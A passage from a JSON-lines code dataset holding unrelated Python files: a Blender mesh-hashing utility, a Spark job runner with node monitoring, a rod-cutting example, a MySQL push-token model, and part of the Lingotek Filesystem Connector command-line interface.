to_spline.use_bezier_u = from_spline.use_bezier_u\n to_spline.use_bezier_v = from_spline.use_bezier_v\n to_spline.use_cyclic_u = from_spline.use_cyclic_u\n to_spline.use_cyclic_v = from_spline.use_cyclic_v\n to_spline.use_endpoint_u = from_spline.use_endpoint_u\n to_spline.use_endpoint_v = from_spline.use_endpoint_v\n to_spline.use_smooth = from_spline.use_smooth\n\n\ndef hash_mesh(hash_algo, mesh: bpy.types.Mesh):\n edge: bpy.types.MeshEdge\n vertex: bpy.types.MeshVertex\n loop: bpy.types.MeshLoop\n polygon: bpy.types.MeshPolygon\n\n for vertex in mesh.vertices:\n hash_algo.update(array(\"d\", [vertex.bevel_weight]))\n hash_algo.update(array(\"d\", vertex.co))\n hash_algo.update(array(\"d\", vertex.normal))\n\n for edge in mesh.edges:\n hash_algo.update(array(\"d\", [edge.bevel_weight, edge.crease, edge.crease]))\n hash_algo.update(array(\"l\", edge.vertices))\n hash_algo.update(array(\"l\", [edge.is_loose, edge.use_edge_sharp, edge.use_seam]))\n\n for loop in mesh.loops:\n hash_algo.update(array(\"l\", [loop.edge_index, loop.vertex_index]))\n hash_algo.update(array(\"d\", loop.normal))\n\n for polygon in mesh.polygons:\n hash_algo.update(array(\"d\", [polygon.loop_start, polygon.loop_total]))\n hash_algo.update(array(\"d\", polygon.normal))\n hash_algo.update(array(\"l\", [polygon.use_smooth]))\n hash_algo.update(array(\"l\", polygon.vertices))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"376850878","text":"from Class.Server import Server\nfrom Class.Master import Master\nfrom typing import List\nfrom datetime import datetime\nfrom os import mkdir\n\n\ndef main(job: str):\n # connect to master\n with open(\"conf/master-port\", \"r\") as f:\n master = Master(int(f.read()))\n\n # connect to slaves\n with open(\"conf/slave-ports\", \"r\") as f:\n ports: List[int] = [int(line) for line in f.readlines()]\n slaves: List[Server] = []\n for port in ports:\n print(\"\")\n slave = Server(port)\n slaves.append(slave)\n\n # start monitor on each slave\n for slave in slaves:\n slave.start_monitor(interval=0.01)\n\n # send command to master to start the job\n master.get_connection().run(\"source /etc/profile && cd $SPARK_HOME && \" + job)\n\n # job is done, stop monitors, the slaves will write data to their own disks\n for slave in slaves:\n slave.stop_monitor()\n\n # collect data to \"./monitor_data/\"\n current_time = str(datetime.now())[:-7]\n folder_name = input(\"Please input the folder name (default: {current_time}):\\n\".format(current_time=current_time))\n folder_name = folder_name if folder_name else current_time\n folder_path = \"./monitor_data/\" + folder_name\n mkdir(folder_path)\n i: int = 1\n for slave in slaves:\n slave.get_connection().get(slave.get_log_path(), \"{folder_path}/slave{i}.csv\".format(folder_path=folder_path,\n i=i))\n i += 1\n\n\nif __name__ == '__main__':\n job: str = \"bin/spark-submit --class org.apache.spark.examples.SparkPi --master spark://192.168.0.200:7077 \" \\\n \"--executor-memory 2g ./examples/jars/spark-examples_2.11-2.4.5.jar 10000\"\n main(job)\n","sub_path":"star_job.py","file_name":"star_job.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"359531570","text":"# coding:utf-8\n\ndef rod_cutting(n, p):\n p.insert(0, 0)\n best_price = [0] # best_price[i]:best price of i length\n first_part = [0] # first_part[i]:first length of i legth\n\n for i in range(1, n+1):\n best_price.append(0)\n first_part.append(0)\n for j in range(1, i+1):\n if best_price[i] < p[j] + best_price[i-j]:\n best_price[i] = p[j] + best_price[i-j]\n first_part[i] = j\n\n return best_price, first_part\n\ndef main():\n n = 10\n p = [1,3,8,8,9,10,18,18,23,25]\n (r, c) = rod_cutting(n, p)\n # show result\n print(\" i|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(i), end=\"\")\n print()\n print(\"p[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(p[i]), end=\"\")\n print()\n print(\"r[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(r[i]), end=\"\")\n print()\n print(\"c[i]|\", end=\"\")\n for i in range(1, n+1):\n print(\"{0:2d}|\".format(c[i]), end=\"\")\n print()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"DP/Rod_Cutting.py","file_name":"Rod_Cutting.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"611065320","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n# vim: tabstop=4 shiftwidth=4 softtabstop=4\n# copyright 2016 Wshuai, Inc.\n# All Rights Reserved.\n\n# @author: WShuai Inc.\n\nimport types\nimport datetime\nfrom Model import Model\n\nclass PushToken(Model):\n def __init__(self, mysql_handler, LOG):\n super(Model, self).__init__()\n self.mysql_handler = mysql_handler\n self.LOG = LOG\n self.id = None\n self.table_name = 'TBL_PUSH_TOKEN'\n self.table_field = [\n { 'name': 'id', 'type': 'int' },\n { 'name': 'user_phone', 'type': 'string' },\n { 'name': 'user_ios_token', 'type': 'string' },\n { 'name': 'user_android_token', 'type': 'string' }\n ]\n self.table_data = {}\n self.table_data_multi = []\n return\n\n def add_token(self, value):\n (ret, num, id) = self.mysql_handler.insert_to_db(self.table_name, value)\n if ret:\n self.LOG.debug('add push token success, id is [%d].' % id)\n elif not ret and num == 1062:\n self.LOG.debug('add push token failed, duplicate key.')\n return ret, id\n \n\n def get_token(self, user_phone):\n condition_map = {\n 'user_phone': user_phone\n }\n condition = self.generate_condition(condition_map)\n if not self.get_model(condition):\n return None\n else:\n self.generate_one_result_from_mysql()\n return self.table_data\n\n def get_tokens(self, user_phones):\n condition = [\n {\n 'name': 'user_phone',\n 'relation': 'in',\n 'value': '(\\'%s\\')' % '\\',\\''.join(user_phones),\n 'has_comma': False\n }\n ]\n if not self.get_model(condition):\n return None\n else:\n self.generate_multi_result_from_mysql()\n return self.table_data_multi\n\n def update_token(self, user_phone, modify_info):\n condition_map = {\n 'user_phone': user_phone\n }\n condition = self.generate_condition(condition_map)\n value = self.generate_value(modify_info)\n (ret, num) = self.mysql_handler.update_to_db([self.table_name], condition, value)\n if ret: \n return True\n else:\n return False\n","sub_path":"src/model/PushToken.py","file_name":"PushToken.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"637911404","text":"''' Python Dependencies '''\nimport click\nimport ctypes\nimport logging\nimport os\nimport subprocess\nimport sys\n\n''' Internal Dependencies '''\nfrom ltk import __version__\nfrom ltk.actions import *\nfrom ltk.constants import LOG_FN, CONF_DIR, METADATA_FIELDS\nfrom ltk.exceptions import UninitializedError, ResourceNotFound, RequestFailedError, AlreadyExistsError\nfrom ltk.logger import logger, API_LOG_LEVEL, API_RESPONSE_LOG_LEVEL, CustomFormatter\nfrom ltk.utils import remove_powershell_formatting\nfrom ltk.watch import WatchAction\n\n''' Globals '''\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\nHIDDEN_ATTRIBUTE = 0x02\npython_version = sys.version\n# Python 3\n# # if python_version[0] < '3':\n# # print('Python 3 is required to run this version of the Lingotek Filesystem connector.\\n\\nFor other versions and troubleshooting, see: https://github.com/lingotek/filesystem-connector')\n# # exit()\n# End Python 3\n\n\ndef abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()\n\ndef init_logger(path):\n \"\"\"\n Initializes logger based on path\n \"\"\"\n logger.setLevel(logging.DEBUG)\n if not path:\n file_handler = logging.FileHandler(LOG_FN)\n else:\n try:\n file_handler = logging.FileHandler(os.path.join(path, CONF_DIR, LOG_FN))\n\n # if on Windows system, set directory properties to hidden\n if os.name == 'nt':\n try:\n subprocess.call([\"attrib\", \"+H\", os.path.join(path, CONF_DIR)])\n except Exception as e:\n logger.error(\"Error on init: \"+str(e))\n # logger.info(\"On Windows, make .ltk folder hidden\")\n # # Python 2\n ret = ctypes.windll.kernel32.SetFileAttributesW(unicode(os.path.join(path, CONF_DIR)), HIDDEN_ATTRIBUTE)\n # # End Python 2\n # # Python 3\n# # ret = ctypes.windll.kernel32.SetFileAttributesW(os.path.join(path, CONF_DIR), HIDDEN_ATTRIBUTE)\n # # End Python 3\n # if(ret != 1): # return value of 1 signifies success\n # pass\n except IOError as e:\n #logger.info(e)\n # todo error check when running init without existing conf dir\n try:\n os.mkdir(os.path.join(path, CONF_DIR))\n # if on Windows system, make directory hidden\n if os.name == 'nt':\n logger.info(\"On Windows, make .ltk folder hidden\")\n # Python 2\n ret = ctypes.windll.kernel32.SetFileAttributesW(unicode(os.path.join(path, CONF_DIR)), HIDDEN_ATTRIBUTE)\n # End Python 2\n # Python 3\n# ret = ctypes.windll.kernel32.SetFileAttributesW(os.path.join(path, CONF_DIR), HIDDEN_ATTRIBUTE)\n # End Python 3\n if(ret != 1): # return value of 1 signifies success\n pass\n except IOError as e:\n print(e.errno)\n print(e)\n\n file_handler = logging.FileHandler(os.path.join(path, CONF_DIR, LOG_FN))\n\n console_handler = logging.StreamHandler(sys.stdout)\n file_handler.setLevel(API_LOG_LEVEL)\n file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s'))\n if quiet:\n console_handler.setLevel(logging.WARNING)\n elif verbosity:\n if verbosity > 1:\n console_handler.setLevel(API_RESPONSE_LOG_LEVEL)\n else:\n console_handler.setLevel(API_LOG_LEVEL)\n else:\n console_handler.setLevel(logging.INFO)\n custom_formatter = CustomFormatter()\n console_handler.setFormatter(custom_formatter)\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n\ndef print_log(error):\n \"\"\"\n Prints the error before logger is initialized\n \"\"\"\n # if not len(logger.handlers):\n print ('Error: {0}'.format(error))\n sys.exit()\n return\n\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n# Python 2\n@click.version_option(version=__version__, message='%(prog)s version %(version)s (Lingotek Filesystem Connector - Python 2)')\n# End Python 2\n# Python 3\n# @click.version_option(version=__version__, message='%(prog)s version %(version)s (Lingotek Filesystem Connector - Python 3)')\n# End Python 3\n@click.option('-q', 'is_quiet', flag_value=True, help='Will only show warnings')\n@click.option('-v', 'verbosity_lvl', count=True, help='Show API calls. Use -vv for API responses.')\ndef ltk(is_quiet, verbosity_lvl):\n global quiet, verbosity\n quiet = is_quiet\n verbosity = verbosity_lvl\n\n\n@ltk.command()\n@click.option('--access_token', help='Your access token')\n@click.option('--host', default='myaccount.lingotek.com', # type=click.Choice(['myaccount.lingotek.com', 'cms.lingotek.com', 'clone.lingotek.com']),\n help='Default environment: myaccount.lingotek.com')\n@click.option('--client_id', help='This is an advanced option that should only be used for clients that have been issued a specified client_id for analytics')\n@click.option('--path', type=click.Path(exists=True),\n help='The path to the project directory to be initialized; defaults to the current directory')\n@click.option('-n', '--project_name', help='The preferred project name, defaults to the current directory name')\n@click.option('-w', '--workflow_id', default='c675bd20-0688-11e2-892e-0800200c9a66',\n help='The id of the workflow to use for this project; defaults to machine translate only')\n@click.option('-b', '--browser', flag_value=True, help='Launches broswer for Authentication')\n@click.option('-l', '--locale', default='en_US', help='The default source locale for the project; defaults to en_US')\n@click.option('-d', '--delete', flag_value=True, # expose_value=False, callback=abort_if_false,\n # prompt='Are you sure you want to delete the current project remotely and re-initialize? '\n # 'Use the -c flag if you only want to change the project.',\n help='Delete the current project remotely and re-initialize')\n# todo add a 'change' option so don't delete remote project\n# @click.option('-c', '--change', flag_value=True, help='Change the Lingotek project. ')\n@click.option('--reset', flag_value=True, help='Reauthorize and reset any stored access tokens')\ndef init(host, access_token, client_id, path, project_name, workflow_id, locale, browser, delete, reset):\n \"\"\" Connects a local project to Lingotek \"\"\"\n try:\n host = 'https://' + host\n if not path:\n path = os.getcwd()\n if not project_name:\n project_name = os.path.basename(os.path.normpath(path))\n init_logger(path)\n\n init = init_action.InitAction(os.getcwd())\n init.init_action(host, access_token, client_id, path, project_name, workflow_id, locale, browser, delete, reset)\n\n if(init.turn_clone_on == False):\n # set the download option in config\n config = config_action.ConfigAction(os.getcwd())\n config.set_clone_option('off', print_info=False)\n\n except (ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command()\n#TO-DO: @click.option('-a', '--all', help='List all configuration settings (including access token)')\n@click.option('-l', '--locale', help='Change the default source locale for the project')\n@click.option('-w', '--workflow_id', is_flag=False, flag_value=\"project default\", help='Change the workflow id for the project')\n@click.option('-ld', '--latest_document', help='Toggle always get latest document option \\'on\\' and \\'off\\'')\n@click.option('-c', '--clone_option', help='Toggle clone download option \\'on\\' and \\'off\\'. Turning clone \\'on\\': Translations will be downloaded to a cloned folder structure, where the root folder for each locale is the locale folder specified in config or a locale folder inside of the default download folder. If a default download folder is not set, then translations will be downloaded to the directory where the project was initialized.' +\n 'Turning clone \\'off\\': Downloaded translations will go into their locale folder (if specified) or default download folder, but not in a cloned folder structure. If no default download folder or locale folder is specified, downloaded translations will go to the same folder as their corresponding source files.')\n@click.option('-ff', '--finalized_file', help='Toggle finalized file download option \\'on\\' and \\'off\\'. Turning finalized file on downloads the finalized file instead of the raw translation.\\\n A finalized file is typically a file that has undergone some sort of post editing like Desktop Publishing after the translation has compeleted.')\n@click.option('-u', '--unzip_file', help='Toggle finalized file UNZIP option \\'on\\' and \\'off\\'. With this option \\'on\\' contents of the finalized file will be placed in the expected directory.')\n@click.option('-d', '--download_folder',\n help='Specify a default folder for where downloaded translations should go. Use --none to remove the download folder. Using --none will cause downloaded translations to download to the same folder as their corresponding source files.')\n@click.option('-t', '--target_locales', multiple=True,\n help='Specify target locales that documents in watch_folder should be assigned; may either specify '\n 'with multiple -t flags (ex: -t locale -t locale) or give a list separated by commas and no spaces '\n '(ex: -t locale,locale)')\n\n@click.option('-p', '--locale_folder', nargs=2, type=str, multiple=True, help='For a specific locale, specify the root folder where downloaded translations should appear. Use --none for the path to clear the download folder for a specific locale. Example: -p fr_FR translations/fr_FR. Note: This only works with clone option \\'on\\'')\n@click.option('-r', '--remove_locales', flag_value=True, help='Remove all locale folders and use the default download location instead.')\n@click.option('-g', '--git', help='Toggle Git auto-commit option on and off')\n@click.option('-gu', '--git_credentials', is_flag=True, help='Open prompt for Git credentials for auto-fill (\\'none\\' to unset); only enabled for Mac and Linux')\n@click.option('-a', '--append_option', help='Change the format of the default name given to documents on the Lingotek system. Define file information to append to document names as none, full, number:+a number of folders down to include (e.g. number:2), or name:+a name of a directory to start after if found in file path (e.g. name:dir). Default option is none.')\n@click.option('-f', '--auto_format', help='Toggle auto format option \\'on\\' and \\'off\\'. Applies formatting during download.')\n@click.option('-md', '--metadata_defaults', is_flag=True, help='Launch the metadata wizard to set the default metadata that will be sent with every document.')\n@click.option('-mp', '--metadata_prompt', help='Toggle prompting for metadata with every add and push. Use the argument \\'on\\' to enable this prompt or \\'off\\' to disable it.')\n@click.option('-mf', '--metadata_fields', help=\"Set the fields that the metadata wizard will use when adding or pushing documents. All default metadata will still be sent. Enter the fields to prompt for as a comma-separated list with no spaces, or enter 'all' to include all the fields. Valid fields are: \"+', '.join(str(field) for field in METADATA_FIELDS))\n\ndef config(**kwargs):\n \"\"\" View or change local configuration \"\"\"\n try:\n action = config_action.ConfigAction(os.getcwd())\n init_logger(action.path)\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n action.config_action(**kwargs)\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Add files and folders\")\n@click.argument('file_names', required=True, nargs=-1)\n@click.option('-d', '--directory', flag_value=True, help='Only add directories, not files inside directories')\n@click.option('-l', '--locale', help='If source locale is different from the default configuration. Use ltk list -l to see possible locales')\n@click.option('-f', '--format',\n help=\"Format of file; if not specified, will use extension to detect; defaults to plaintext. Use ltk list -f to see possible formats. Files may not be added to Lingotek's system if not formatted correctly according to the specified format\")\n@click.option('-D', '--download_folder', type=click.Path(exists=True), help='Download folder for the translations for this file. If set, it will take precedence over locale folders and the default download folder and will ignore clone as well as the no_ext argument when pulling/downloading')\n@click.option('-o', '--overwrite', flag_value=True, help='Overwrite previously added file if the file has been modified')\n@click.option('-s', '--srx', type=click.Path(exists=True), help='srx file')\n@click.option('-si', '--srx_id', help='srx id')\n@click.option('-i', '--its', type=click.Path(exists=True), help='its file')\n@click.option('-ii', '--its_id', help='its id')\n@click.option('-c', '--charset', help='File encoding')\n@click.option('-ff', '--fprm', type=click.Path(exists=True), help='fprm file')\n@click.option('-fi', '--fprm_id', help='fprm id')\n@click.option('-fs', '--fprm_subfilter', type=click.Path(exists=True), help='fprm subfilter file')\n@click.option('-fsi', '--fprm_subfilter_id', help='fprm subfilter id')\n@click.option('-v', '--vault_id', help='Save-to TM vault id')\n@click.option('-e', '--external_url', help='Source url')\n@click.option('--due_date', help='Due date (as Unix timestamp, in milliseconds)')\n@click.option('--due_reason', help='Reason for due date')\n@click.option('-m', '--metadata', flag_value=True, help=\"Launches the metadata wizard\")\n\n# # Metadata - optional parameters\n# @click.option('--author_email', help='Author email')\n# @click.option('--author_name', help='Author name')\n# @click.option('--business_division', help='Business division')\n# @click.option('--business_unit', help='Business unit')\n# @click.option('--campaign_id', help='Campaign ID')\n# @click.option('--campaign_rating', help='Campaign rating')\n# @click.option('--channel', help='Channel')\n# @click.option('--contact_email', help='Contact email')\n# @click.option('--contact_name', help='Contact name')\n# @click.option('--content_description', help='Content description')\n# @click.option('--content_type', help='Content type')\n# @click.option('--domain', help='Domain')\n# @click.option('--external_application_id', help='External application ID')\n# @click.option('--external_document_id', help='External document ID')\n# @click.option('--external_style_id', help='External style ID')\n# @click.option('--job_id', help='Job ID')\n# @click.option('--purchase_order', help='Purchase Order')\n# @click.option('--reference_url', help='Reference URL')\n# @click.option('--region', help='Region')\n# @click.option('--require_review', help='Require review')\n# @click.option('--category_id', help='Category ID')\n# @click.option('--note', help='Note')\n\n# Metadata - optional parameters\n@click.option('--author_email', hidden=True)\n@click.option('--author_name', hidden=True)\n@click.option('--business_division', hidden=True)\n@click.option('--business_unit', hidden=True)\n@click.option('--campaign_id', hidden=True)\n@click.option('--campaign_rating', hidden=True)\n@click.option('--channel', hidden=True)\n@click.option('--contact_email', hidden=True)\n@click.option('--contact_name', hidden=True)\n@click.option('--content_description', hidden=True)\n@click.option('--content_type', hidden=True)\n@click.option('--domain', hidden=True)\n@click.option('--external_application_id', hidden=True)\n@click.option('--external_document_id', hidden=True)\n@click.option('--external_style_id', hidden=True)\n@click.option('--job_id', hidden=True)\n@click.option('--purchase_order', hidden=True)\n@click.option('--reference_url', hidden=True)\n@click.option('--region', hidden=True)\n@click.option('--require_review', hidden=True)\n@click.option('--category_id', hidden=True)\n@click.option('--note', hidden=True)\n\ndef add(file_names, **kwargs):\n #\"\"\" Add files and folders for upload to Lingotek. Fileglobs (e.g. *.txt) can be used to add all matching files and/or folders. Added folders will automatically add the new files added or created inside of them. \"\"\"\n \"\"\" Add files and folders for upload to Lingotek. Fileglobs (e.g. *.txt) can be used to add all matching files and/or folders. Added folders will automatically add the new files added or created inside of them.\n \n Metadata can be added by launching the metadata wizard with the -m flag or by using flags for specific metadata. The metadata flags are --author_email, --author_name, --business_division, --business_unit, --campaign_id, --campaign_rating, --channel, --contact_email, --contact_name, --content_description, --content_type, --domain, --external_application_id, --external_document_id, --external_style_id, --job_id, --purchase_order, --reference_url, --region, --require_review, --category_id, and --note \"\"\"\n try:\n action = add_action.AddAction(os.getcwd())\n init_logger(action.path)\n\n file_names = remove_powershell_formatting(file_names)\n\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n\n action.add_action(file_names, **kwargs)\n except (UninitializedError, RequestFailedError, ResourceNotFound, AlreadyExistsError) as e:\n print_log(e)\n logger.error(e)\n return\n\n@ltk.command(short_help=\"Sends updated content to Lingotek for documents that have been added; defaults to the entire project.\")\n@click.option('-n', '--test', 'test', flag_value=True, help='Shows which files will be added or updated without actually uploading any content')\n@click.option('-t', '--title', 'title', flag_value=True, help='Display document titles rather than file paths')\n@click.argument('files', type=click.Path(exists=True), required=False, nargs=-1)\n@click.option('--due_date', help='Due date (as Unix timestamp, in milliseconds)')\n@click.option('--due_reason', help='Reason for due date')\n@click.option('-m', '--metadata', flag_value=True, help=\"Launches the metadata wizard\")\n@click.option('-o', '--metadata-only', 'metadata_only', flag_value=True, help=\"Only updates the metadata and due date/due reason and does not update the document contents\")\n\n# # Metadata - optional parameters\n# @click.option('--author_email', help='Author email')\n# @click.option('--author_name', help='Author name')\n# @click.option('--business_division', help='Business division')\n# @click.option('--business_unit', help='Business unit')\n# @click.option('--campaign_id', help='Campaign ID')\n# @click.option('--campaign_rating', help='Campaign rating')\n# @click.option('--channel', help='Channel')\n# @click.option('--contact_email', help='Contact email')\n# @click.option('--contact_name', help='Contact name')\n# @click.option('--content_description', help='Content description')\n# @click.option('--content_type', help='Content type')\n# @click.option('--domain', help='Domain')\n# @click.option('--external_application_id', help='External application ID')\n# @click.option('--external_document_id', help='External document ID')\n# @click.option('--external_style_id', help='External style ID')\n# @click.option('--job_id', help='Job ID')\n# @click.option('--purchase_order', help='Purchase Order')\n# @click.option('--reference_url', help='Reference URL')\n# @click.option('--region', help='Region')\n# @click.option('--require_review', help='Require review')\n# @click.option('--category_id', help='Category ID')\n# @click.option('--note', help='Note')\n\n# Metadata - optional parameters\n@click.option('--author_email', hidden=True)\n@click.option('--author_name', hidden=True)\n@click.option('--business_division', hidden=True)\n@click.option('--business_unit', hidden=True)\n@click.option('--campaign_id', hidden=True)\n@click.option('--campaign_rating', hidden=True)\n@click.option('--channel', hidden=True)\n@click.option('--contact_email', hidden=True)\n@click.option('--contact_name', hidden=True)\n@click.option('--content_description', hidden=True)\n@click.option('--content_type', hidden=True)\n@click.option('--domain', hidden=True)\n@click.option('--external_application_id', hidden=True)\n@click.option('--external_document_id', hidden=True)\n@click.option('--external_style_id', hidden=True)\n@click.option('--job_id', hidden=True)\n@click.option('--purchase_order', hidden=True)\n@click.option('--reference_url', hidden=True)\n@click.option('--region', hidden=True)\n@click.option('--require_review', hidden=True)\n@click.option('--category_id', hidden=True)\n@click.option('--note', hidden=True)\n\ndef push(test, title, files, metadata, metadata_only, **kwargs):\n #\"\"\" Sends updated content to Lingotek for documents that have been added. Fileglobs (e.g. *.txt) can be used to push all matching files \"\"\"\n \"\"\" Sends updated content to Lingotek for documents that have been added. Fileglobs (e.g. *.txt) can be used to push all matching files\n\n Metadata can be updated by launching the metadata wizard with the -m flag or by using flags for specific metadata. The metadata flags are --author_email, --author_name, --business_division, --business_unit, --campaign_id, --campaign_rating, --channel, --contact_email, --contact_name, --content_description, --content_type, --domain, --external_application_id, --external_document_id, --external_style_id, --job_id, --purchase_order, --reference_url, --region, --require_review, --category_id, and --note \"\"\"\n try:\n action = push_action.PushAction(os.getcwd(), test, title)\n init_logger(action.path)\n action.push_action(files=files, set_metadata=metadata, metadata_only=metadata_only, **kwargs)\n except UninitializedError as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Add targets to document(s) to start translation; defaults to the entire project. Use ltk list -l to see possible locales\")\n@click.option('-n', '--doc_name', help='The name of the document for which to request target locale(s)')\n@click.option('-p', '--path', type=click.Path(exists=True), help='The file name or directory for which to request target locale(s)')\n@click.option('-c', '--cancel', 'to_cancel', flag_value=True, help='Cancels a specified target locale')\n@click.option('-d', '--delete', 'to_delete', flag_value=True, help='Deletes a specified target locale')\n@click.option('--due_date', help='The due date of the translation')\n@click.option('-w', '--workflow', help='The workflow of the translation (Use \"ltk list -w\" to see available workflows)')\n@click.argument('locales', required=False, nargs=-1) # can have unlimited number of locales\ndef request(doc_name, path, locales, to_cancel, to_delete, due_date, workflow):\n \"\"\" Add targets to document(s) to start translation; defaults to the entire project. If no locales are specified, Filesystem Connector\n will look for target watch locales set in ltk config. Use ltk list -l to see possible locales. \"\"\"\n try:\n action = request_action.RequestAction(os.getcwd(), doc_name, path, locales, to_cancel, to_delete, due_date, workflow)\n init_logger(action.path)\n if locales and isinstance(locales,str):\n locales = [locales]\n\n doc_name = remove_powershell_formatting(doc_name)\n path = remove_powershell_formatting(path)\n\n action.target_action()\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n# todo add a --all option to see all document ids once only show relative to cwd is implemented\n@ltk.command(name='list', short_help='Shows docs (default), workflows, locales, formats, or filters')\n@click.option('-t', '--title', 'title', flag_value=True, help='List document titles and folder paths from project root instead of relative file paths')\n@click.option('-c', '--hide_docs', 'hide_docs', flag_value=True, help='Collapse down to list only added directories instead of both directories and documents.')\n@click.option('-w', '--workflows', 'id_type', flag_value='workflow', help='List available workflows')\n@click.option('-l', '--locales', 'id_type', flag_value='locale', help='List supported locale codes')\n@click.option('-f', '--formats', 'id_type', flag_value='format', help='List supported formats')\n@click.option('-r', '--remote', 'id_type', flag_value='remote', help='List all project documents on Lingotek Cloud')\n@click.option('--filters', 'id_type', flag_value='filter', help='List default and custom filters')\n@click.option('-d', '--download_folder', 'show_dests', flag_value=True, help=\"Show target download folders for files that have had them set\")\ndef list(**kwargs):\n \"\"\" Shows docs, workflows, locales, formats, or filters. By default lists added folders and docs. \"\"\"\n try:\n action = list_action.ListAction(os.getcwd())\n init_logger(action.path)\n action.list_action(**kwargs)\n\n except (UninitializedError, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help=\"Gets the status of a specific document or all documents\")\n@click.option('-n', '--doc_name', help='Specific document name to get status of')\n@click.option('-d', '--detailed', flag_value=True, help='Detailed status of each locale for the document')\n@click.option('-a', '--all', flag_value=True, help='List all project documents on Lingotek Cloud')\ndef status(**kwargs):\n \"\"\" Gets the status of a specific document or all documents \"\"\"\n try:\n action = status_action.StatusAction(os.getcwd())\n init_logger(action.path)\n\n for f in kwargs:\n if kwargs[f]:\n temp = remove_powershell_formatting(kwargs[f])\n kwargs[f] = temp\n\n action.get_status(**kwargs)\n except (UninitializedError, ResourceNotFound) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help='Download specified translations')\n@click.option('-a', '--auto_format', flag_value=True, help='Flag to auto apply formatting during download')\n@click.option('-l', '--locales', help=\"Specify locales to download (defaults to all target locales for the document). For multiple locales give a list separated by commas and no spaces (ex: en_US,en_GB).\")\n@click.option('-e', '--locale_ext', flag_value=True, help=\"Specifies to add the name of the locale as an extension to the file name (ex: doc1.fr_FR.docx). This is the default unless the clone download option is active.\")\n@click.option('-n', '--no_ext', flag_value=True, help=\"Specifies to not add the name of the locale as an extension to the file name. This is the default if the clone download option is active.\")\n@click.option('-x', '--xliff', flag_value=True, help=\"Download xliff version of the specified translation\")\n@click.argument('file_names', type=click.Path(exists=True), required=True, nargs=-1)\ndef download(auto_format, locales, locale_ext, no_ext, xliff, file_names):\n \"\"\" Downloads translated content specified by filename for specified locales, or all locales if none are specified. Change download options and folders using ltk config.\"\"\"\n try:\n action = download_action.DownloadAction(os.getcwd())\n init_logger(action.path)\n\n for name in file_names:\n action.download_by_path(name, locales, locale_ext, no_ext, auto_format, xliff)\n print(\"\\n\")\n\n except (UninitializedError, ResourceNotFound, RequestFailedError) as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(short_help='Pulls translations for all added documents for all locales or by specified locales')\n@click.option('-a', '--auto_format', flag_value=True, help='Flag to auto apply formatting during download')\n@click.option('-e', '--locale_ext', flag_value=True, help=\"Specifies to add the name of the locale as an extension to the file name (ex: doc1.fr_FR.docx). This is the default unless the clone download option is active.\")\n@click.option('-n', '--no_ext', flag_value=True, help=\"Specifies to not add the name of the locale as an extension to the file name. This is the default if the clone download option is active.\")\n@click.argument('locales', nargs=-1)\ndef pull(auto_format, locale_ext, no_ext, locales):\n \"\"\" Pulls translations for all added documents for all locales or by specified locales \"\"\"\n try:\n download = download_action.DownloadAction(os.getcwd())\n action = pull_action.PullAction(os.getcwd(), download)\n init_logger(action.path)\n if locales:\n for locale in locales:\n action.pull_translations(locale, locale_ext, no_ext, auto_format)\n else:\n action.pull_translations(None, locale_ext, no_ext, auto_format)\n except UninitializedError as e:\n print_log(e)\n logger.error(e)\n return\n\n\n@ltk.command(name=\"rm\", short_help=\"Disassociates local doc(s) from Lingotek Cloud and cancels the remote copy\")\n@click.argument('file_names', required=False, nargs=-1)\n@click.option('-d', '--directory', flag_value=True, help='Only remove directories, not files inside directories')\n@click.option('-i', '--id', flag_value=True, help='Cancels documents with the specified ids (instead of file names) on Lingotek Cloud. Can be used to cancel documents that are not locally tracked.')\n@click.option('-n', '--name', flag_value=True, help='Cancels documents with the specified names (instead of file names or paths) on Lingotek Cloud')\n@click.option('-a', '--all', flag_value=True, help='Cancels all documents from Lingotek Cloud that are found locally')\n@click.option('-l', '--local', flag_value=True, help='Deprecated. Use \\'ltk rm -f -a\\' for all documents or \\'ltk rm -f\\' for specific documents. (Legacy Usage: deletes all documents locally and cancels them in the Lingotek Cloud. Can be used in association with --name to delete a specified document locally.)')\n@click.option('-r', '--remote', flag_value=True, help='Deletes specified documents from Lingotek Cloud instead of cancelling them')\n@click.option('-f', '--force', flag_value=True, help='Delete local copy when cancelling remote source documents')\ndef rm(file_names, **kwargs):\n \"\"\"\n Disassociates local doc(s) from Lingotek Cloud and removes them from the project by cancelling them. If the remote copy should be deleted, use the -r flag.\n \"\"\"\n try:\n action = rm_action.RmAction(os.getcwd())\n init_logger(action.path)\n if not file_names and not (('all' in kwargs and kwargs['all']) or ('local' in kwargs and kwargs['local'])):\n 